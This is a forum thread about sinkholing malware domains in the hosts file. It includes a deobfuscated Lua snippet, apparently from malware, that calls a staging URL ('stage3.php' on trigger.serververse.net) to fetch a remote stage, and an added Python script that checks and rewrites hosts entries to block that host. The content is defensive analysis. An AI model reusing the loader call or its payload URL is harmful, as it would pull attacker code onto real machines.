What is this in script?

Exactly - you should block the domains - doing this will route the traffic back to you. But it will still get routed.

Let’s pretend the ‘bad guys’ have a backup domain / alternate method of compromise we don’t know about yet. They can simply just revert the changes on the machine to maintain persistence or worse, use this workaround AGAINST you somehow…

It’s not a bad method, just not airtight…

What do you mean? I know exactly how the hosts file works - I’ve leveraged it both in Unix and Windows. What do you think I’ve been saying? Did you not just see my source?

That’s not really an issue; it no longer reaches the original servers, so it can’t get a payload to execute.

Alternatively, change it to 0.0.0.0 so it isn’t routed. Both have the same effect.

Hey. This is the code (Lua) deobfuscated. Just in case anyone finds this useful in 2024.

-- Obfuscated lookup table: entry [4] is indexed with entry [1] to obtain the
-- function that is then called with the URL and a two-argument callback.
FsCsYJWTUlikHlZDxTBFZQLbHMuimqEfYSwYwBnyUJlIgPXcFZgTViIxtZwcfxBJSfCvGU[4][FsCsYJWTUlikHlZDxTBFZQLbHMuimqEfYSwYwBnyUJlIgPXcFZgTViIxtZwcfxBJSfCvGU[1]](
  "https://trigger.serververse.net/v2_/stage3.php?to=zXEA4H", -- The URL. Another cipher.
  function(QRCjQbRkEciwsFKICgtfZkeIFzHNoNTHkQBdKUBLbsiMFDqWnkxIawbaVsbjePbjnxABUz, fTWxfqwdawxIumeDDlqFCaYCGgHMrGRRHnaDriZcigTcMkElutobhmkympaWENusQuQAPP)
    -- callback body is empty in the posted snippet
  end
)
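As an added example (not code from the page or from any of the commenters), the Python below ties the two halves of the thread together: it pulls the staging host out of the stage-3 URL in the deobfuscated Lua above, parses a hosts file and reports whether that host is actually sinkholed to 127.0.0.1 or 0.0.0.0 (or their IPv6 counterparts), and rewrites the file so that any competing live mapping is removed. Re-running the check later is the cheap answer to the "they can just revert the change" point raised earlier: a hosts file where the sinkhole line has been deleted, or a real address added next to it, comes back as unblocked. The sample hosts-file contents, the 203.0.113.9 address, and the pairing of 0.0.0.0 with :: and 127.0.0.1 with ::1 are constructed assumptions for the example.

```python
"""Hosts-file sinkhole check for the stage-3 staging host (added example)."""
import hashlib
import ipaddress
from urllib.parse import urlsplit

# Addresses that count as a sinkhole. The thread mentions 127.0.0.1 and 0.0.0.0;
# the IPv6 counterparts are included so an AAAA-style entry is also recognised.
SINKHOLES = {"127.0.0.1", "0.0.0.0", "::1", "::"}

# The stage-3 URL quoted in the deobfuscated Lua above.
STAGE3_URL = "https://trigger.serververse.net/v2_/stage3.php?to=zXEA4H"


def domain_from_url(url: str) -> str:
    """Lower-cased hostname of a URL, i.e. the part a hosts entry can block."""
    host = urlsplit(url).hostname
    if not host:
        raise ValueError(f"no hostname in {url!r}")
    return host.lower().rstrip(".")


def parse_hosts(text: str) -> dict[str, set[str]]:
    """Map each name in a hosts file to the set of addresses it is given.

    Handles full-line and trailing '#' comments, several names per line, mixed
    tabs/spaces, and skips lines whose first field is not a valid IP address.
    """
    table: dict[str, set[str]] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            addr = str(ipaddress.ip_address(fields[0]))
        except ValueError:
            continue  # not an address/name mapping
        for name in fields[1:]:
            table.setdefault(name.lower().rstrip("."), set()).add(addr)
    return table


def is_sinkholed(table: dict[str, set[str]], domain: str) -> bool:
    """True only if every address given for the domain is a sinkhole.

    A '203.0.113.9 evil.example' line next to '0.0.0.0 evil.example' would
    otherwise look blocked while a real address is still on offer.
    """
    addrs = table.get(domain.lower().rstrip("."))
    return bool(addrs) and addrs <= SINKHOLES


def unblocked(text: str, blocklist: list[str]) -> list[str]:
    """Blocklisted domains the hosts file does not sinkhole (the reverted case)."""
    table = parse_hosts(text)
    return [d for d in blocklist if not is_sinkholed(table, d)]


def render_entries(blocklist: list[str], sink: str = "0.0.0.0") -> str:
    """Hosts lines sinkholing each domain: the IPv4 sink plus its IPv6 pairing.

    Assumption for this example: 0.0.0.0 pairs with :: and 127.0.0.1 with ::1.
    """
    sink6 = "::1" if sink == "127.0.0.1" else "::"
    lines = ["# sinkhole entries (added example)"]
    for d in blocklist:
        lines.append(f"{sink} {d}")
        lines.append(f"{sink6} {d}")
    return "\n".join(lines) + "\n"


def sinkhole(text: str, blocklist: list[str], sink: str = "0.0.0.0") -> str:
    """Return hosts text with every existing mapping for the blocklisted names
    removed and fresh sinkhole entries appended. Names are matched per token,
    so other names sharing a line survive; a line left with no names is dropped."""
    targets = {d.lower().rstrip(".") for d in blocklist}
    kept: list[str] = []
    for raw in text.splitlines():
        body, sep, comment = raw.partition("#")
        fields = body.split()
        names = [n for n in fields[1:] if n.lower().rstrip(".") not in targets]
        if len(fields) > 1 and len(names) != len(fields) - 1:
            if not names:
                continue
            raw = " ".join([fields[0], *names]) + (f" {sep}{comment}" if sep else "")
        kept.append(raw)
    return "\n".join(kept) + "\n" + render_entries(blocklist, sink)


def fingerprint(text: str) -> str:
    """SHA-256 of the hosts file, to notice it changing between checks."""
    return hashlib.sha256(text.encode()).hexdigest()


# Constructed sample: the staging host is sinkholed once but also has a live
# mapping further down, which is exactly the kind of revert the check must catch.
SAMPLE_HOSTS = """\
127.0.0.1   localhost
::1         localhost ip6-localhost
# sinkhole for the stage-3 host
0.0.0.0     trigger.serververse.net   # trailing comment
203.0.113.9 trigger.serververse.net
"""

if __name__ == "__main__":
    blocklist = [domain_from_url(STAGE3_URL)]
    print("still reachable:", unblocked(SAMPLE_HOSTS, blocklist))
    fixed = sinkhole(SAMPLE_HOSTS, blocklist)
    print("after rewrite:", unblocked(fixed, blocklist))
    print("changed:", fingerprint(SAMPLE_HOSTS) != fingerprint(fixed))
```

On a real machine, feed `sinkhole()` the contents of /etc/hosts (or %SystemRoot%\System32\drivers\etc\hosts on Windows) and write the result back with administrative rights; keep the `fingerprint()` of the result somewhere the malware cannot reach and compare on a schedule. Note the limits the thread already raises: this only covers names the sample resolves through the hosts file, so a backup domain, a hard-coded IP, or a process that bypasses the system resolver is not caught by it.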